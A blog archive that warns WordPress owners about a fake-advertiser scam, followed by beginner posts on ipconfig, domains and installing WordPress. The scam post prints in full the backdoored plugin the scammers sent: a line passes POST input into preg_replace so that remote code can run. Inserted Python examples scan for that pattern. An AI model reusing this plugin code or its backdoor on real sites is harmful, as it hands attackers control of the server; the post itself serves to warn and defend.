Category Archives: Internet

WordPress Scam


There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment; details may change somewhat:

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00”


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00

4. Finally, I get this email, complete with a password:

Hi!

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

login: my other site
password: email me for password

You should install and activate the plugin in order to display advertisement.
Before making payment, advertiser must approve location of the banner.
The banner will be shown on your site when you add special code to your web-address
(for example: http://www.my other site.com/?adv_test=1).
It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

What way of payment is suitable for you?

Best regards,
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a PHP script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';}?>

_____________________________________________________________________________

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860

My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.
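The line that answers the question of what the script does is the top-level `preg_replace()` call: its pattern and replacement both come from the POST body and it runs before any permission check, which on PHP versions older than 7.0 (where the `/e` pattern modifier still exists) hands code execution to whoever sends the request. The following Python triage script is an added example, not part of the original post or the plugin (rule names and function names are assumptions); it flags that construct and the download-and-write call in a PHP file before it goes near a server, using lines abridged from the listing above as its sample.

```python
import re

# Request superglobals an HTTP client controls directly.
TAINTED = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# Code-execution sinks and the argument positions that matter (None = any).
# preg_replace: the pattern (argument 0) can carry the /e modifier on PHP < 7.
CODE_SINKS = {"eval": None, "assert": None, "create_function": None,
              "call_user_func": (0,), "preg_replace": (0,)}
FETCHERS = {"curl_exec", "file_get_contents"}

def split_call(src, open_idx):
    """Return (args, end_idx) for the bracketed group opening at open_idx,
    tracking quotes and nesting so inner commas do not split an argument."""
    args, depth, quote, start, i = [], 0, None, open_idx + 1, open_idx
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1                       # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([{":
            depth += 1
        elif ch in ")]}":
            depth -= 1
            if depth == 0:
                args.append(src[start:i].strip())
                return args, i
        elif ch == "," and depth == 1:
            args.append(src[start:i].strip())
            start = i + 1
        i += 1
    return args, len(src)                    # unbalanced input: best effort

def calls(src, name):
    """Yield (line_number, args) for each call to `name`, skipping methods."""
    for m in re.finditer(r"(?<![\w$>:])" + re.escape(name) + r"\s*\(", src):
        yield src.count("\n", 0, m.start()) + 1, split_call(src, m.end() - 1)[0]

def fetch_wrappers(src):
    """FETCHERS plus any function defined in src whose body calls one."""
    names = set(FETCHERS)
    for m in re.finditer(r"\bfunction\s+(\w+)\s*\([^)]*\)\s*\{", src):
        body = src[m.end():split_call(src, m.end() - 1)[1]]
        if any(re.search(r"\b" + f + r"\s*\(", body) for f in FETCHERS):
            names.add(m.group(1))
    return names

def scan_php(src):
    """Return sorted (line, rule, function) findings for one PHP source string.
    Comments and string contents are not stripped, so treat hits as triage."""
    findings = []
    for sink, positions in CODE_SINKS.items():
        for line, args in calls(src, sink):
            watched = args if positions is None else [a for p, a in enumerate(args) if p in positions]
            if any(TAINTED.search(a) for a in watched):
                findings.append((line, "request-data-to-code-sink", sink))
    fetch = re.compile(r"(?<![\w$>:])(" + "|".join(sorted(fetch_wrappers(src))) + r")\s*\(")
    for line, args in calls(src, "file_put_contents"):
        if len(args) > 1 and fetch.search(args[1]):
            findings.append((line, "remote-content-written-to-disk", "file_put_contents"))
    return sorted(findings)

# Constructed sample: lines abridged from the plugin listing in this post.
SAMPLE = r'''<?php
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
function advReadUrl($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    $result = curl_exec($curl);
    return $result;
}
file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
update_option('adv_place', $_REQUEST['adv_place']);
'''

if __name__ == "__main__":
    for line, rule, func in scan_php(SAMPLE):
        print("line %d: %s (%s)" % (line, rule, func))
```

The `create_function()` and `update_option()` lines are not reported: the first passes only constant strings and the second is not a code-execution sink.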

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!


WordPress Comment Scam

Update: This scammer is using different names. The names used that I know of are: Rayan Meyer, Killian Blanchard, Mathis Gaillard, among many others. Please read this post to understand the modus operandi and then go to the site mentioned below for even more details. Good luck!

Scams are everywhere, it seems. Yesterday I received a comment on one of my other websites. The commenter asked if I was interested in placing a banner ad (from a major company) on the site. The person apologized for making a comment instead of emailing. I realized that I didn’t have an email address on the site and this made his comment sound legitimate.

Now my site isn’t as popular as this one. It’s about kitchens, kitchenrenovation411.com, and probably isn’t a site that an advertiser would pick for a banner ad. This should have twigged me that this was a scam. However, the company that this person was supposedly going to link to the banner is a very reputable company. Maybe the clientèle from my site fit the demographics they were looking for. Hey, it’s money, right?

I emailed the person and quoted a figure then did some heavy research. It seems that this kind of thing has been going on for quite a while. Here is a site that describes the dilemma that many WordPress bloggers find themselves in and the tricks scammers use to gain access to websites: http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87842

Here are some tips to avoid losing your website to a scammer:

1. If it sounds too good to be true, it almost certainly is. Whenever money is involved, our eyes light up and we start planning for the future. That’s human nature. Most WordPress sites don’t make any money at all. If someone contacts you about a site that isn’t very popular, you know it is a scam.

2. Do your research. Search Google using the complete email or comment on your blog. This will almost certainly lead to a forum or another site that the scammer has contacted. Read what has been posted and confirm that your contact is fake.

3. Advertisers don’t send their advertising code in a zip file. If you get a zip file from someone who has contacted you through your website, you know it’s got a trojan in it. The contact that I am writing about insists that they will not use any java code, simply a link to the website of the advertiser. Baloney! There will be a zip file coming, I can guarantee it.

4. Brand name companies don’t work through small advertising companies. The website of the person who contacted me looks very professional but it hasn’t been updated since 2007. The website is also exactly the same as another company listed in the link above. Both sites are identical, the only difference is the person who is sending out the emails.

5. If you’ve been taken in by this kind of scam, you should consider your website to be compromised. Links will likely take users to other sites or, worse, your site may be used to email spam. Work with your hosting company to rid your site of the malware on it.

Hopefully this post will help you avoid this type of unusual scam. This kind of thing is criminal activity and should be considered as a threat to your site as well as to your hosting company. Once this kind of thing is on a server, there are many ways for it to spread. Hopefully your host can stay on top of it.

Thanks for reading.



Ipconfig



Ipconfig seems like a strange title for a post, right? Once you see how ipconfig can help you, it might lose its strangeness.

I’ve written about the command prompt in previous posts (here is one: https://brianmahoney.ca/?s=command+prompt). The command prompt takes you back to the days of DOS but it’s more like a window into the soul of your computer. Consider Windows/OS X the dining room of a restaurant while the command prompt is the kitchen, where the actual work gets done.

If you start a command prompt (start/programs/accessories/command prompt) then type ipconfig, you’ll see something like this:

(Screenshot: the result of typing 'ipconfig' at the command prompt.)

What does all of this mean? Well, a lot of it means nothing, quite frankly, but some of it is valuable if you get stuck and have to access your router. The IPv4 number is the IP address of your current computer. The Default Gateway number is the IP address of your router. Ignore the other numbers.

I’m assuming that almost everyone who reads this is using a router to access the Internet. If your Internet goes down or your computer seems sluggish, there are a couple of things that ipconfig can help you with. One of them is the IP address of your router. This isn’t the same as the IP address that connects you to the Internet, it’s the one that you use to connect your computer to the router. Basically there are three IP addresses that you would encounter every day. One is the IP address that your router feeds to your computer. The other is the one that you use to access your router. The third one, which doesn’t really matter unless you want to hide it from someone, is the one that your Internet provider sends to your router to allow it to connect to the Internet. Lots of numbers!

If you have to access your router, you would type an address something like this: 192.168.0.1 into your browser. This number is the IP address of a D-Link router. Your router probably has a different number but many are quite similar. Some use the 192.168.1.1 combination instead. Assuming that you are connected to the router, by typing in the router’s IP address and a password (default is admin), you can gain access to the router’s menu. This would allow you to change different settings or simply reset your Internet connection (instead of getting up, walking over to it and powering it off then on again).

If your computer seems to be running slowly on the Internet, typing ipconfig /renew will refresh the IP address of your current computer. Typing ipconfig /? displays the full menu of commands for ipconfig.

Most of us use ipconfig to renew the IP address but, as you can see, there are many more things that this command can do.

Thanks for reading!



Buy Your Own Domain



Buying a domain (that’s a .com name, if you don’t know) is cheap, fast and fun. Even if you don’t know a thing about HTML or WordPress, if you’ve got a catchy name, why not register it? Sure, there are millions of domains that have been registered already, but this doesn’t mean you should give up. Some people go as far as to snap up domains, locking them up before anyone else gets them. Personally, this doesn’t make a lot of sense but everyone is different. I guess if you’ve got money to tie up, maybe it makes sense.

Buying a domain means that you have it for a one year term. Many discount hosting companies offer significant discounts if you sign up for a two year or longer term. Many also give you discounts if you buy multiple domains at a time.

Right now, I would stick to the old .com domain if you’re going to try and make some money with it. People know .com, they assume that every site is a .com site and immediately head to whatever.com, even if the site is whatever.org.

In fact, when you are signing up for your domain with most companies, they will offer you all of the various combinations of your domain at the same time. Want whatever.com? How about getting whatever.org or whatever.net at the same time? The point of this, of course, is to guard against someone else stealing traffic away from your catchy name. Think of it. If you could snag google.org or google.info, you would. You’d be crazy not to.

Once you have your domain, think about doing something with it. As you might have read in past posts, I use WordPress on all of my sites. You can read about installing WordPress here and about how to set up your domain hosting here. Anything you want to know about installation and hosting is on this site, just search for the answers if you’re stuck. If I can do it, you probably can too.

Thanks for reading!



Installing WordPress – October 28, 2011



Now we’re finally ready to install WordPress. We’ve got our domain name and hosting here. We set our nameservers here. Over here, we created a database and named it. OK, looks like we’re set.

1. Download WordPress.

2. Unzip it then copy and paste the WordPress folder on to your desktop. (Put it anywhere you want but putting it on the desktop is easier for beginners.)

3. Listen carefully to this part. First you have the zip file to unzip. Inside that is a WordPress 3.x folder (depending on which version is out now). Inside that folder is a WordPress folder (just that, no number). Inside that folder are ALL the files you need to upload to the folder in your hosting account. Don’t upload the WordPress folder, just the folders and files inside the WordPress folder. Get it? Those files look like this:

(Screenshot: inside the WordPress folder. From WP-Admin to xmlrpc.php, these are the files you need.)

4. Open your FTP program (I recommend FileZilla). On the left side of the window, navigate to your Desktop then to the folder that contains the WordPress files as shown above. Connect to your host using your username and password, then navigate to the folder where you want to put your files. This is the folder that is inside your root directory, right? It should be the only folder in your root directory. It should also be empty, except for the placeholder file (index.html) that we created here.

5. In the WordPress folder on the left, click on WP-Admin (the folder at the top), scroll down to the bottom, hold down the shift key and click on xmlrpc.php. All of the files and folders in that WordPress folder will now be highlighted. Right click in the blue area and choose Upload. Depending on your FTP and upload speed, this last step might take a bit of time, maybe 5 minutes or less.

6. Wait until FileZilla finishes (no more queued files). You should now have a full selection of files on the right hand side from WP-Admin to xmlrpc.php. The next step can be done in FileZilla but I prefer to do it in the File Manager on my hosting site. Do what you feel better with here.

7. You are about to edit one file. If you make a mistake, it’s not a big deal so don’t get your knickers in a knot. All that will happen is that WordPress won’t be able to install itself…yet. Even if you really screw things up, you can always delete everything inside your host folder and start over again. Relax, OK?

You are looking for the wp-config-sample.php file. This file is the one that tells WordPress what database you are using, what the password is and who the user is for that database. Remember when we did all of that here?

8. Find the wp-config-sample.php file and click on it once. On the right side of the window you will see three icons. The one you want is the ‘edit’ icon. Click it and a small window will open up or you will be taken to another page, depending on which hosting interface your host uses. The file is full of simple text that looks really complicated. Look for this section:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'database_name_here');

/** MySQL database username */
define('DB_USER', 'username_here');

/** MySQL database password */
define('DB_PASSWORD', 'password_here');
____________________________________________

9. Enter the database name, username and password of the MySQL database that we made earlier. Leave the apostrophes in, just type in the database name, user and password like this:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sitedatabase1');

/** MySQL database username */
define('DB_USER', 'joeschmoo');

/** MySQL database password */
define('DB_PASSWORD', 'goodpassword');
____________________________________________

10. In another browser window, paste this URL (taken from the wp-config-sample.php file): https://api.wordpress.org/secret-key/1.1/salt/

You will see a simple page that has information like this on it:

_______________________________________________

define('AUTH_KEY',         'G;^s;iqRh${ovHzc&n9s31-i2*U DkHI9u]#jWt&nPByL`e)cw7Zz9TJ|.c7Hu1f');
define('SECURE_AUTH_KEY',  'a|Bx@bXxFL@)1$0t]MyEvg1nt=aagDu%E9S9V>WZ<:as#)2pbY@Dv6xJv.`A>GM&');
define('LOGGED_IN_KEY',    'jFHyxThnTAu_Nxk(iHDj,|VwOQ@$V^Je: bO&c$&-IX)IGp[#Jr&F$rv9X98[dqs');
define('NONCE_KEY',        'n1P/X(*Y|ta#f1lde(gj!}L{r1{^Mu--v`fJ32)a-N1.S _4j*WBy/4!w+SvrNS-');
define('AUTH_SALT',        ')TgQ&Uj0QH?AP*+UCu]>{3{w5*(+-tL|U&]*)MhEP@YG|/dqFMVDK=-a!22&zWg+');
define('SECURE_AUTH_SALT', 'R]m:Fm*gO%Vmi^HL+_GQmd-h_,~u k,=%j^5q]b8m3[|?N[ksmfm=s%=oM]1gb1.');
define('LOGGED_IN_SALT',   'F.}Du-=]$|GBm|5tNH|haDASOu`=-Cv<RS2hKV].cNS+ex=-dX zlN6}ql)$sNz:');
define('NONCE_SALT',       '!?i5/5mjG;Fz%WxLNQEg~~+5nJiMY0yAo~T6Om%<_$&ae:{f(~Y2a}G8vQ/*&>x|');

11. Copy that information (from the word define until the last semi-colon, exactly as is shown above). Don’t use the data shown here, get your own for security’s sake.

12. In the wp-config-sample.php file, find the EXACT section that corresponds to the information on the webpage you just opened. Highlight everything from the word define down to the last semi-colon. Once that is highlighted, either right click and choose ‘paste’ or hit control and v at the same time. Either way, the info from the webpage is pasted into the file you are editing.

13. This is important, read this carefully. Just below the section we just worked on, you’ll see the section for the ‘WordPress Database Table prefix’. Locate it and find the section that reads:

_____________________________________

$table_prefix  = 'wp_';

____________________________________

14. Change the part between the apostrophes to some combination of numbers, letters and underscores. It will look something like this after you’re done:

______________________________________

$table_prefix  = 'new_site143uty';

______________________________________

This is an important step which adds to the security of your WordPress installation. You don’t need this information but you can write it down anyway. WordPress uses it, not you.

15. Last step, usually only needed if the current settings don’t work. Farther up from where we are, you will see a section (under the section where you put the database password) that reads:

_____________________________________________

/** MySQL hostname */
define('DB_HOST', 'localhost');

_____________________________________________

Most of the time, ‘localhost’ works just fine. If it doesn’t or if you just want to be sure, you’ll have to enter the path to the MySQL database that you are using. Save the file you are editing. Head back to the control panel and go into the MySQL databases again. Click on the database that you created and somewhere there will be a ‘generate code’ button. What you are looking for is ‘your server name’. This will be something that looks like a domain name: accountname.hostmysql.com. Copy this and head back to the wp-config-sample.php file, open it for editing, highlight the word localhost, then paste the new .com line into that space. It will look like this:

____________________________________________

/** MySQL hostname */
define('DB_HOST', 'accountname.hostmysql.com');

____________________________________________

At this point, save the file and stretch a bit, grab a coffee or something and smile because you’re almost done. The hard part is over. It’s all fun from now on.

16. In your host’s File Manager, look up at the top of the right hand side till you find the Wp-Admin folder. Open it and look for the install.php file. Click on it then choose ‘preview’ on the right. A webpage will open up. If you’ve done everything correctly, you can install WordPress from this page. Click OK and create a username (don’t use admin, choose something different), take the standard password that WordPress creates for you, enter your email (make sure it’s correct since there is no way to recover your password if you put in the wrong email here) then click OK.

17. Here, I do two things. I take a screen capture of the page to ensure that I have the password and username correct, then I copy and paste the password into a text file for safekeeping. OK, I write it out in a book, too.

18. Once you’ve done all of this, log in to WordPress and start creating.

These are the steps as I do them for each installation of WordPress that I’ve done. In case you are wondering, I’ve done this about twenty-four times. I hope this sounds simple and that it’s all clear to you. Most of the information here is explained in the WordPress installation area but some of it is from trial and error. One of my hosts was fine with ‘localhost’ for the database host but my current host wasn’t. I hope it works for you.
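Steps 9 to 15 can also be scripted. The following added example (not from the original post or from WordPress; `fill_config` and its helpers are hypothetical names) applies them to the text of wp-config-sample.php, escaping a password that contains an apostrophe or backslash so it cannot break the file, and generating the eight keys locally with Python's `secrets` module instead of copying them from the api.wordpress.org page.

```python
import re
import secrets
import string

KEY_NAMES = ["AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT"]
# Printable ASCII minus ' and \ so a generated key never needs escaping
# inside a single-quoted PHP string.
KEY_ALPHABET = "".join(c for c in string.ascii_letters + string.digits + string.punctuation
                       if c not in "'\\")


def php_quote(value):
    """Return value as a single-quoted PHP string literal."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def set_define(text, name, value):
    """Swap the value in define('NAME', '...'), insisting on exactly one match."""
    pattern = re.compile(r"define\(\s*'" + name + r"'\s*,\s*'(?:[^'\\]|\\.)*'\s*\)")
    text, count = pattern.subn(lambda m: "define('%s', %s)" % (name, php_quote(value)), text)
    if count != 1:
        raise ValueError("expected exactly one define() for " + name)
    return text


def random_prefix(length=8):
    """Table prefix made of letters, digits and underscores only (step 14)."""
    alphabet = string.ascii_lowercase + string.digits
    return "wp" + "".join(secrets.choice(alphabet) for _ in range(length)) + "_"


def fill_config(sample, db_name, db_user, db_password, db_host="localhost"):
    """Apply steps 9 to 15 to the text of wp-config-sample.php."""
    text = sample
    for name, value in (("DB_NAME", db_name), ("DB_USER", db_user),
                        ("DB_PASSWORD", db_password), ("DB_HOST", db_host)):
        text = set_define(text, name, value)
    for name in KEY_NAMES:                      # a fresh 64-character value each
        text = set_define(text, name, "".join(secrets.choice(KEY_ALPHABET) for _ in range(64)))
    prefix = random_prefix()
    text, count = re.subn(r"\$table_prefix\s*=\s*'[^']*'\s*;",
                          lambda m: "$table_prefix = '%s';" % prefix, text)
    if count != 1:
        raise ValueError("expected exactly one $table_prefix assignment")
    return text


# Constructed sample: an abridged wp-config-sample.php.
SAMPLE_CONFIG = """<?php
define('DB_NAME', 'database_name_here');
define('DB_USER', 'username_here');
define('DB_PASSWORD', 'password_here');
define('DB_HOST', 'localhost');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
$table_prefix  = 'wp_';
"""

if __name__ == "__main__":
    print(fill_config(SAMPLE_CONFIG, "sitedatabase1", "joeschmoo", "it's a good\\password"))
```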

Thanks for reading! Follow me on Twitter: @_BrianMahoney